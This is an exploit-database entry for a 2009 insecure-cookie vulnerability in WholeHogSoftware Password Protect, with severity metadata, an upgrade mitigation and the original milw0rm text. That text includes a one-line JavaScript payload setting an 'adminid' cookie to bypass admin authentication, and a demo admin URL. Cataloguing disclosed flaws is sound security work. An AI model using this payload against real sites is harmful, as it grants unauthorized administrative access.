header-logo
Suggest Exploit
vendor:
Password Protect
by:
Mountassif Moad
7.5
CVSS
HIGH
Insecure Cookie Handling
264
CWE
Product Name: Password Protect
Affected Version From: N/A
Affected Version To: 1.0.0
Patch Exists: YES
Related CWE: N/A
CPE: wholehogsoftware:password_protect
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

WholeHogSoftware Password Protect Insecure Cookie Handling Vulnerability

A vulnerability in WholeHogSoftware Password Protect allows an attacker to set an adminid cookie to 8, granting them administrative access to the application. This is done by using a malicious JavaScript payload, which sets the cookie to 8 and sets the path to '/'. This vulnerability affects versions prior to 1.0.1.

Mitigation:

Upgrade to version 1.0.1 or later.
Source

Exploit-DB raw data:

###########################################################################
[+] WholeHogSoftware Password Protect Insecure Cookie Handling Vulnerability
[+] Script   :Password Protect
[+] Site     :http://wholehogsoftware.com
[+] Detay    :http://www.wholehogsoftware.com/index.php/page/password_protect_enhanced
[+] Discovered By Mountassif Moad   
              
[+] www.v4-team.com            
       
[+] Greetz : All my Freind
###########################################################################
Exploit:
javascript:document.cookie = "adminid=8; path=/";
DeMo :
http://www.wholehogsoftware.com/demo/password_protect_enhanced/admin

# milw0rm.com [2009-02-03]